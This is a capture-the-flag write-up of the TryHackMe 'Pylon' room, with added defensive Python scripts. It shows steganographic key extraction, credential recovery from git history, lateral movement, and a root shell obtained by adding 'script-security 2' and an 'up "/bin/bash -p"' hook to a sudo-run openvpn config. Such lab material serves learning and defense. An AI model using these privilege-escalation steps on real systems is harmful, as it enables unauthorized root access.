Pylon is a medium-difficulty room authored by pood0g. The room has the user find 4 flags, starting with the analysis of a data file using steganography. The room warns that password reuse is bad practice, so it's something to keep in mind as we navigate through the challenges.

Where appropriate, I shall be using the following conventions -

  • $victim_ip to denote the IP of the victim machine (replace your victim’s IP in this place).
  • #[REDACTED] to symbolize removal of room answers or to shorten typical output of command execution / code.

Let’s get started!

Download and analyze the task files

Downloading the file reveals an image of a dog, which is confirmed when we analyze its properties using the file command. Using exiftool, we can see that the Subject field contains a URL leading to a customized CyberChef recipe.

A quick steghide info on the file reveals that there is possibly a hidden file within the image, but a passphrase is required to extract it. Using the filename as the passphrase lets us extract the hidden file lone. Analyzing the file shows that it looks base64-encoded.

A quick decode of the file produces a gzip-compressed archive which, when extracted, produces a private key. Given the name of the file, we can make our first assumption that the key belongs to a user named lone.

# Check the file properties of the pepper file.
> file pepper.jpg                                           
pepper.jpg: JPEG image data, baseline, precision 8, 2551x1913, components 3
                        
> exiftool pepper.jpg
ExifTool Version Number         : 12.39
File Name                       : pepper.jpg
Directory                       : .
File Size                       : 381 KiB
File Modification Date/Time     : 2022:02:04 07:57:57-05:00
File Access Date/Time           : 2022:02:08 22:39:35-05:00
File Inode Change Date/Time     : 2022:02:04 07:59:17-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
XMP Toolkit                     : Image::ExifTool 12.16
Subject                         : https://gchq.github.io/CyberChef/#recipe=To_Hex('None',0)To_Base85('!-u',false)
Image Width                     : 2551
Image Height                    : 1913
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 2551x1913
Megapixels                      : 4.9

# Check for any hidden files
> steghide info pepper.jpg
"pepper.jpg":
  format: jpeg
  capacity: 20.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
steghide: could not extract any data with that passphrase!

# Extract hidden file
> steghide extract -sf pepper.jpg
Enter passphrase: 
wrote extracted data to "lone".

# Analyze extracted file

> head -n 10 lone                                              
H4sIAAAAAAAAA+3Vya6zyBUA4H/NU9w9ilxMBha9KObZDMY2bCIGG2MmMw9P39c3idRZtJJNK4rE
J6FT0imkoupQp2zq+9/z9NdfCXyjafoTMZoCf4wfBEnQvzASAJKkAX7EfgEMo2jw6wv8pav6p7Ef
ou7r69e7aVKQ/fm8/5T/P/W3D06UVevrZIuW5ylftqte4Fn80sXgJ4vEBFfGtbVFPNaFt2JIXyL8
4GRqiiv/MxTjih1DB/4L93mk+TNMtwTPhqRGrOdPav5++TPRESFJ1ZenOJwJutdri7sq+CXob/EL
MhPUmTsglUeXSeBo5bLs9C5nDNqMBNpIE+gmnwBsxHPDGMFz4ai7SgmsvsWNPJ4FOMqhM/otyliH
J1c9oim/K4aSFa7FdUDstCNASlyCiXA9voVmfuQzj019mi/O0WCK6fJMiw3I/sOG5UN1n4oyOJFT
O/Rcu0Mqv1RbZw8eZto9omonQ8A9mrUWj56ycWZo8w2S2n0JURnxiSsC0fAnQ9CdNCyvcQQK6WAn
eVvUhRC0eBUXvJsixOt6w/1qAdfBxmf+yXLOoV+Xsybc6mPFi31jqYeuMfSVw0a56g9vKecWD7Rp
HkJ4OvLruVhl5BnOMcbplf/ZeebprXXL+v37ODl/PImfg+CgI7yq9Cp6mP0Y5zYBUvAIL/mSjogp
rAzsFvqcpegIb+cGV4OQX0RxBDWXVfT0oM2AdvjMPb3mIVdEpSRfhQ06a8wiyjR5Mix5CvE6eiZQ

# Decode and analyze file

> cat lone | base64 -d > lone_decoded

> file lone_decoded
lone_decoded: gzip compressed data, from Unix, original size modulo 2^32 10240

> mv lone_decoded lone_decoded.tgz

> tar zxvf lone_decoded.tgz 
lone_id
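The session above peels three layers by hand (base64, then gzip, then tar) and identifies each with file. The following is an added example, not part of the original write-up, that automates the same triage in Python: it classifies each layer by magic bytes (gzip's 1f 8b, the "ustar" marker at offset 257 of a tar header, a PEM "PRIVATE KEY" banner) and keeps unwrapping until it reaches something it cannot decode further. The sample input is constructed inline (a placeholder key file, tarred, gzipped and base64-encoded, mirroring the 10240-byte tar the page's file command reports); the key text is a placeholder, not a real key.

```python
import base64
import binascii
import gzip
import io
import tarfile

# Magic values for the container formats in this chain.
GZIP_MAGIC = b"\x1f\x8b"
TAR_MAGIC_OFFSET = 257          # "ustar" sits at byte 257 of a tar header
TAR_MAGIC = b"ustar"


def looks_like_base64(data: bytes) -> bool:
    """True if data is base64 text (line breaks allowed, strict alphabet)."""
    stripped = b"".join(data.split())
    if not stripped or len(stripped) % 4:
        return False
    try:
        base64.b64decode(stripped, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def identify(data: bytes) -> str:
    """Minimal stand-in for `file`: classify by magic bytes / content."""
    if data.startswith(GZIP_MAGIC):
        return "gzip"
    if data[TAR_MAGIC_OFFSET:TAR_MAGIC_OFFSET + len(TAR_MAGIC)] == TAR_MAGIC:
        return "tar"
    if data.startswith(b"-----BEGIN ") and b"PRIVATE KEY-----" in data[:64]:
        return "private-key"
    if looks_like_base64(data):
        return "base64"
    return "unknown"


def unwrap(data: bytes, max_layers: int = 8):
    """Peel base64/gzip layers until a leaf type is reached.

    Returns (layers_seen, leaf_type, payload). For a tar archive the payload
    is a dict of member name -> member bytes instead of raw bytes.
    """
    layers = []
    for _ in range(max_layers):
        kind = identify(data)
        layers.append(kind)
        if kind == "base64":
            data = base64.b64decode(b"".join(data.split()))
        elif kind == "gzip":
            data = gzip.decompress(data)
        elif kind == "tar":
            members = {}
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tar:
                for member in tar.getmembers():
                    if member.isfile():
                        members[member.name] = tar.extractfile(member).read()
            return layers, kind, members
        else:
            return layers, kind, data
    raise ValueError("gave up after %d layers" % max_layers)


def build_sample() -> bytes:
    """Constructed input: a placeholder key file, tarred, gzipped, base64'd.

    The key text below is a placeholder, not a real private key.
    """
    key = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
           b"PLACEHOLDER-NOT-A-REAL-KEY\n"
           b"-----END OPENSSH PRIVATE KEY-----\n")
    raw_tar = io.BytesIO()
    with tarfile.open(fileobj=raw_tar, mode="w") as tar:
        info = tarfile.TarInfo("lone_id")
        info.size = len(key)
        tar.addfile(info, io.BytesIO(key))
    return base64.encodebytes(gzip.compress(raw_tar.getvalue()))


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    layers, kind, payload = unwrap(blob)
    print("layers:", " -> ".join(layers))
    if kind == "tar":
        for name, content in payload.items():
            print(f"  {name}: {len(content)} bytes, {identify(content)}")
```

Run it with a file path to unwrap a real blob, or with no arguments to process the constructed sample. The tar branch reads members from memory rather than writing them to disk, which avoids the path-traversal risk of extracting an untrusted archive with tar zxvf.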

Enumerate and exploit server’s open ports

We can run a port scan against the server to identify open ports, with a particular interest in SSH. The scan reveals two SSH services, on ports 22 and 222. The key works on port 222 and we are presented with the pyLon server.

When prompted for an encryption key, we can make an educated guess based on the CyberChef link and the initial assumption of password reuse. Generating the key by running pepper through the CyberChef recipe, we are able to access the pyLon service.

Selecting the first option, to decrypt a password, gives us the first flag as well as the password for the lone user, which we can use to SSH into port 22.

rustscan -a $victim_ip -r 1-65535 -- -sC -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |                                                              
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'                                                              
The Modern Day Port Scanner.         
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
😵 https://admin.tryhackme.com                                                                                        
                                                                                                                      
[~] The config file is expected to be at "/home/kali/.rustscan.toml"                                                  
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers   
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.                                                                                                   
Open $victim_ip:22                                                                                                 
Open $victim_ip:222                                                                                                
[~] Starting Script(s)                                                                                                
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}") 

[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-08 23:20 EST                                     
NSE: Loaded 155 scripts for scanning.                                                                                 
NSE: Script Pre-scanning.

#[REDACTED]

PORT    STATE SERVICE REASON  VERSION                                                                                 
22/tcp  open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                            
#[REDACTED]

222/tcp open  ssh     syn-ack OpenSSH 8.4 (protocol 2.0)   
#[REDACTED]

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel    
 

# Change permission of private key and SSH into server
> chmod 600 lone_id

> ssh -i lone_id -p 222 lone@$victim_ip


                  /               
      __         /       __    __
    /   ) /   / /      /   ) /   )
   /___/ (___/ /____/ (___/ /   /
  /         /                     
 /      (_ /  pyLon Password Manager
                   by LeonM

[*] Encryption key exists in database.

Enter your encryption key: # Use the output from CyberChef as the encryption key.

[1] Decrypt a password.
[2] Create new password.
[3] Delete a password.
[4] Search passwords.

# Select 1 to access the passwords saved by the Password Manager

         SITE                        USERNAME
 [1]     pylon.thm                   lone                        
 [2]     FLAG 1                      FLAG 1    

Password for FLAG 1

        Username = FLAG 1
        Password = #[REDACTED]

Password for pylon.thm

        Username = lone
        Password = #[REDACTED] 

[1] Decrypt a password.
[2] Create new password.
[3] Delete a password.
[4] Search passwords.

Select an option [Q] to Quit: Q

[*] Quitting, are you sure?
(Y)es or (N)o: Y

[*] Database closed cleanly.
Connection to $victim_ip closed.
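The recipe leaked in the EXIF Subject field, To_Hex('None',0) followed by To_Base85('!-u',false), is an encoding, not encryption: anyone holding the recipe and guessing the input word recovers the key. The following added example (mine, not the room author's) reproduces the recipe in Python and its inverse, so a defender can see that the "encryption key" is a deterministic, reversible transform of a guessable word. It assumes that CyberChef's To_Hex emits lowercase hex with no delimiter and that To_Base85 with the '!'..'u' alphabet and no delimiters is standard Ascii85, which base64.a85encode implements; the test inputs are constructed.

```python
import base64
import binascii

# The '!'..'u' alphabet selected in the recipe (standard Ascii85).
ASCII85_ALPHABET = "".join(chr(c) for c in range(ord("!"), ord("u") + 1))


def recipe_hex_then_base85(text: str) -> str:
    """Reproduce To_Hex('None',0) followed by To_Base85('!-u',false).

    To_Hex with no delimiter yields lowercase hex; To_Base85 with the
    '!'..'u' alphabet and no <~ ~> delimiters is plain Ascii85. Hex text
    never contains a 4-byte all-zero group, so the Ascii85 'z' shorthand
    cannot appear in the output.
    """
    hex_text = binascii.hexlify(text.encode("utf-8")).decode("ascii")
    return base64.a85encode(hex_text.encode("ascii")).decode("ascii")


def undo_recipe(token: str) -> str:
    """Invert the recipe. No secret is needed: this is encoding, not encryption."""
    hex_text = base64.a85decode(token.encode("ascii")).decode("ascii")
    return binascii.unhexlify(hex_text).decode("utf-8")


def is_recipe_output(token: str) -> bool:
    """Cheap triage: could this string be the output of the recipe?"""
    if not token or any(ch not in ASCII85_ALPHABET for ch in token):
        return False
    try:
        hex_text = base64.a85decode(token.encode("ascii")).decode("ascii")
        binascii.unhexlify(hex_text)
    except (ValueError, binascii.Error, UnicodeDecodeError):
        return False
    return True


if __name__ == "__main__":
    # Constructed input; the room's actual key material is not reproduced here.
    sample = "example-input"
    token = recipe_hex_then_base85(sample)
    print(f"{sample!r} -> {token!r} -> {undo_recipe(token)!r}")
```

The practical lesson for a password-manager author: a key that a user types must be something only the user knows, not the output of a public recipe applied to a word already used as a steghide passphrase.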

SSH with new password on port 22

With lone’s password discovered, we can SSH into the server on Port 22. Once we are in, we can find the user flag user1.txt in lone’s home directory.

We also notice that there is another encrypted file, note_from_pood.gpg, which the gpg tool shows requires a passphrase. Trying all the passwords we have gathered so far doesn't help.

However, within the pylon directory we notice a .git folder, implying that the pylon project has been under version control and has a history. A quick git log in the pylon directory confirms this. It is likely that earlier versions of the application contain sensitive information that we can exploit.

We can access an earlier commit by using git checkout with the hash of the first commit. This reveals an older file titled pyLon_pwMan.py. Following the instructions in the README.txt and executing the script brings us back to the familiar pyLon database. We can recycle the key we used during our SSH session on port 222 to gain access and obtain the password for the gpg file.


NOTE: As part of my information gathering efforts, I religiously copied the files from lone's home directory and attempted to decrypt the gpg file. However, because I do not have the associated encryption keys, I struggled. I would encourage you to decrypt the file from lone's account rather than doing it on your machine.


With this password, we can read the message in the encrypted gpg file, obtaining additional credentials that will allow us to move laterally into a colleague's account, pood.

But before moving into pood's account, we can enumerate lone and notice that he has sudo permission to execute the openvpn command as root, but only with a fixed .ovpn configuration file. lone lacks the rights to change this file, but the ability to run openvpn as root is an interesting fact we should keep in our notes.

> ssh lone@$victim_ip

The authenticity of host '$victim_ip ($victim_ip)' can't be established.
ED25519 key fingerprint is SHA256:a4J2LwSwZl59RFhvrfKuRiFGA2RDy+i9GN/nNgd2b44.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:14: [hashed name]
    ~/.ssh/known_hosts:20: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '$victim_ip' (ED25519) to the list of known hosts.
lone@$victim_ip's password: # Enter password here

Welcome to
                   /
       __         /       __    __
     /   ) /   / /      /   ) /   )
    /___/ (___/ /____/ (___/ /   /
   /         /
  /      (_ /       by LeonM

lone@pylon:~$

> ls
note_from_pood.gpg  pylon  user1.txt

> cat user1.txt
#[REDACTED]

> cd pylon/ # Change into the pylon project folder

> git log   # Read the git changes / commit log

commit 73ba9ed2eec34a1626940f57c9a3145f5bdfd452 (HEAD, master)
Author: lone <lone@pylon.thm>
Date:   Sat Jan 30 02:55:46 2021 +0000

    actual release! whoops

commit 64d8bbfd991127aa8884c15184356a1d7b0b4d1a
Author: lone <lone@pylon.thm>
Date:   Sat Jan 30 02:54:00 2021 +0000

    Release version!

commit cfc14d599b9b3cf24f909f66b5123ee0bbccc8da
Author: lone <lone@pylon.thm>
Date:   Sat Jan 30 02:47:00 2021 +0000

    Initial commit!

# Next command extracts the hash of the first (oldest) commit (cfc14d599b9b3cf24f909f66b5123ee0bbccc8da)
> git checkout $(git log --format=%H | tail -n 1)
Previous HEAD position was 73ba9ed actual release! whoops
HEAD is now at cfc14d5 Initial commit!

> git log # Confirm that git is on the commit of interest.
commit cfc14d599b9b3cf24f909f66b5123ee0bbccc8da (HEAD)
Author: lone <lone@pylon.thm>
Date:   Sat Jan 30 02:47:00 2021 +0000

    Initial commit!

> ls # pyLon_pwMan.py appears in the file listing
README.txt  banner.b64  pyLon.db  pyLon_crypt.py  pyLon_db.py  pyLon_pwMan.py

> python3 pyLon_pwMan.py                                          
                                                           
                  /                                        
      __         /       __    __                          
    /   ) /   / /      /   ) /   )                         
   /___/ (___/ /____/ (___/ /   /                          
  /         /                                              
 /      (_ /  pyLon Password Manager                       
                   by LeonM                                                                                           

[*] Encryption key exists in database.                     
                                                           
Enter your encryption key: # Use password as used over SSH Port 222.

[*] Encryption key correct.    
[*] Initialization complete.

[1] List passwords.
[2] Decrypt a password.
[3] Create new password.
[4] Delete a password.
[5] Search passwords.
[6] Display help menu.

Select an option [Q] to Quit: 2                            
                                            
         SITE                        USERNAME              
 [1]     pylon.thm_gpg_key           lone_gpg_key                                                                     

Select a password [C] to cancel: 1

Password for pylon.thm_gpg_key
                                                           
        Username = lone_gpg_key
        Password = #[REDACTED]

# Quit application and return to command line.

> cd ~ # Return to home directory of user

> gpg -d note_from_pood.gpg

# Enter the new password in the Passphrase section.
┌────────────────────────────────────────────────────────────────┐
│ Please enter the passphrase to unlock the OpenPGP secret key:  │
│ "lon E <lone@pylon.thm>"                                       │
│ 3072-bit RSA key, ID D83FA5A7160FFE57,                         │
│ created 2021-01-27 (main key ID EA097FFFA0996DAA).             │
│                                                                │
│                                                                │
│ Passphrase: ****************__________________________________ │
│                                                                │
│         <OK>                                    <Cancel>       │
└────────────────────────────────────────────────────────────────┘

gpg: encrypted with 3072-bit RSA key, ID D83FA5A7160FFE57, created 2021-01-27
      "lon E <lone@pylon.thm>"
Hi Lone,

Can you please fix the openvpn config?

It's not behaving itself again.

oh, by the way, my password is #[REDACTED]

Thanks again.

> sudo -l # Let's see what sudo commands he can execute
Password: # Enter lone's password

Matching Defaults entries for lone on pylon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lone may run the following commands on pylon:
    (root) /usr/sbin/openvpn /opt/openvpn/client.ovpn

> ls -la /opt/openvpn/client.ovpn # lone has no rights to change the file.
-rw-rw---- 1 root root 8225 Feb 10 13:52 /opt/openvpn/client.ovpn 
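The git history is the pivot in this stage: a file removed from the working tree (pyLon_pwMan.py) is still fully recoverable from older commits, and so is anything sensitive it or the database ever contained. The following added example (mine, not the room's or the pyLon project's code) is the check a repository owner would run before shipping: it parses the output of git log --all -p, reports added lines matching credential-looking patterns together with the commit and file they landed in, and lists files that were deleted at some point in history. The sample log is constructed inline with placeholder hashes and a hypothetical hard-coded credential; scan_repo() runs the same logic over a real checkout via the git binary.

```python
import re
import subprocess

# Content patterns a reviewer would flag in committed lines (added lines only).
SECRET_PATTERNS = [
    re.compile(r"(?i)(pass(word|wd|phrase)?|secret|token|api[_-]?key)\s*[:=]"),
    re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
]

# Constructed sample of `git log --all -p` output (placeholder hashes and a
# hypothetical hard-coded credential; not the room's real history).
SAMPLE_LOG = """\
commit 2222222222222222222222222222222222222222
Author: lone <lone@pylon.thm>
Date:   Sat Jan 30 02:54:00 2021 +0000

    Release version!

diff --git a/pyLon_pwMan.py b/pyLon_pwMan.py
deleted file mode 100644
index 1111111..0000000
--- a/pyLon_pwMan.py
+++ /dev/null
@@ -1,2 +0,0 @@
-# legacy manager
-DB_PASSWORD = "placeholder-secret"

commit 1111111111111111111111111111111111111111
Author: lone <lone@pylon.thm>
Date:   Sat Jan 30 02:47:00 2021 +0000

    Initial commit!

diff --git a/pyLon_pwMan.py b/pyLon_pwMan.py
new file mode 100644
index 0000000..1111111
--- /dev/null
+++ b/pyLon_pwMan.py
@@ -0,0 +1,2 @@
+# legacy manager
+DB_PASSWORD = "placeholder-secret"
"""


def parse_patch_log(log_text):
    """Yield (commit, path, added_line) for every '+' line in the patch log."""
    commit = path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("diff --git "):
            path = line.split(" b/", 1)[1]          # "diff --git a/X b/X" -> X
        elif line.startswith("+") and not line.startswith("+++"):
            yield commit, path, line[1:]


def find_secrets(log_text):
    """Return (short_commit, path, line) for added lines matching a pattern."""
    hits = []
    for commit, path, content in parse_patch_log(log_text):
        if any(p.search(content) for p in SECRET_PATTERNS):
            hits.append(((commit or "")[:7], path, content.strip()))
    return hits


def deleted_files(log_text):
    """Paths removed at some point in history; their old blobs still exist."""
    removed, path = set(), None
    for line in log_text.splitlines():
        if line.startswith("diff --git "):
            path = line.split(" b/", 1)[1]
        elif line.startswith("deleted file mode"):
            removed.add(path)
    return removed


def scan_repo(repo_path):
    """Scan a real checkout: every ref, every commit, full patches."""
    log = subprocess.run(
        ["git", "-C", repo_path, "log", "--all", "-p", "--no-color"],
        capture_output=True, text=True, check=True).stdout
    return find_secrets(log), deleted_files(log)


if __name__ == "__main__":
    import sys
    hits, removed = scan_repo(sys.argv[1]) if len(sys.argv) > 1 else (
        find_secrets(SAMPLE_LOG), deleted_files(SAMPLE_LOG))
    for commit, path, line in hits:
        print(f"[secret?] {commit} {path}: {line}")
    for path in sorted(removed):
        print(f"[deleted in history] {path}")
```

A hit in an old commit means the secret must be rotated, not merely deleted from the tree: git rm removes the file from the current commit, while the blob stays reachable from every earlier one, which is exactly what made the checkout of cfc14d5 productive here.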

Laterally move into pood’s account

Now that we have pood's password, we can move laterally into their account. Listing the home directory reveals user2.txt, which we can read to obtain the flag.

Enumerating the user, we see that pood has sudo permission to edit (via sudoedit) the client.ovpn file that lone can execute as root but cannot edit. As pood we can modify the file so that openvpn spawns a bash shell, and because openvpn is launched through lone's sudo rule, that shell runs as root.

With root privileges, we can navigate to the root folder and list its contents, then decrypt the gpg file for the root flag.

> su pood
Password: # Enter pood's password

pood@pylon:/home/lone$ cd # Enter pood's home directory

> ls
user2.txt

> cat user2.txt
#[REDACTED]

> sudo -l # Let's see pood's sudo rights
Matching Defaults entries for pood on pylon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pood may run the following commands on pylon:
    (root) sudoedit /opt/openvpn/client.ovpn

# Executing sudo command allows us to edit the client.ovpn file.

> sudoedit /opt/openvpn/client.ovpn # Make the changes and quit the editor.

client
dev tun
proto udp
remote 127.0.0.1 1194
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-CBC
script-security 2 # Add this line to allow openvpn to execute external scripts
up "/bin/bash -p" # Add this line to spawn the bash shell when the tunnel comes up

<ca>
-----BEGIN CERTIFICATE-----
#[REDACTED]

> exit # Return to lone's account [use this if you performed an 'su']

> sudo /usr/sbin/openvpn /opt/openvpn/client.ovpn # Run the command and spawn the root shell.
root@pylon:/home/lone# 

> cd /root
> ls
root.txt.gpg
> gpg -d root.txt.gpg 
gpg: encrypted with 3072-bit RSA key, ID 91B77766BE20A385, created 2021-01-27
      "I am g ROOT <root@pylon.thm>"
#[REDACTED]
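The root cause here is a pair of sudo rules that compose into a root-equivalent grant: lone may run openvpn as root on one fixed config, and pood may write that config with sudoedit, so the up hook in the file executes with root's privileges. The following added example (mine, not the room author's) is the audit a defender would run over an .ovpn file before allowing it in such a sudo rule: it parses the directives (skipping comments and inline <ca>...</ca> blocks), tracks the script-security level, and reports every hook that would execute a program when the config is loaded. The two configs are constructed from the page's client.ovpn with the certificate body replaced by a placeholder; the set of hook directive names and OpenVPN's default script-security level of 1 are taken from the OpenVPN manual.

```python
import re
import shlex

# Hooks through which OpenVPN runs an external program when permitted by
# script-security; they execute with the daemon's privileges (root here).
SCRIPT_HOOKS = {
    "up", "down", "route-up", "route-pre-down", "ipchange",
    "client-connect", "client-disconnect", "learn-address",
    "auth-user-pass-verify", "tls-verify",
}

# Constructed configs: the page's client.ovpn with the certificate body
# replaced by a placeholder, once as shipped and once with the two added lines.
CLEAN_OVPN = """\
client
dev tun
proto udp
remote 127.0.0.1 1194
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-CBC
<ca>
-----BEGIN CERTIFICATE-----
PLACEHOLDER-CERT-BODY
-----END CERTIFICATE-----
</ca>
"""
TAMPERED_OVPN = CLEAN_OVPN.replace(
    "cipher AES-256-CBC\n",
    'cipher AES-256-CBC\nscript-security 2   # added\nup "/bin/bash -p"   # added\n')


def parse_ovpn(text):
    """Return [(directive, [args])], skipping comments and <tag>...</tag> blocks."""
    directives, in_block = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if in_block:                       # inside <ca>, <cert>, <key>, ...
            if line == f"</{in_block}>":
                in_block = None
            continue
        for marker in ("#", ";"):          # both start a comment in OpenVPN
            line = line.split(marker, 1)[0]
        line = line.strip()
        if not line:
            continue
        block = re.fullmatch(r"<([a-z-]+)>", line)
        if block:
            in_block = block.group(1)
            continue
        parts = shlex.split(line)          # honours the quoting in up "/bin/bash -p"
        directives.append((parts[0], parts[1:]))
    return directives


def audit_ovpn(text):
    """Flag directives that would execute a program when this config is loaded."""
    directives = parse_ovpn(text)
    level = 1                              # OpenVPN's default script-security level
    for name, args in directives:
        if name == "script-security" and args:
            level = int(args[0])
    findings = []
    for name, args in directives:
        if name in SCRIPT_HOOKS:
            command = " ".join(args)
            state = "WILL RUN" if level >= 2 else "blocked by script-security %d" % level
            findings.append(f"{name}: '{command}' ({state})")
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else TAMPERED_OVPN
    for finding in audit_ovpn(text) or ["no script hooks found"]:
        print(finding)
```

The audit catches a tampered file after the fact; the actual mitigation is in sudoers. A rule that runs openvpn as root must point at a config that only root can write, and no other user should hold sudoedit on it. The hooks are still reported at script-security 1 because a later edit that raises the level turns them live without touching the hook line itself.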

And we are done!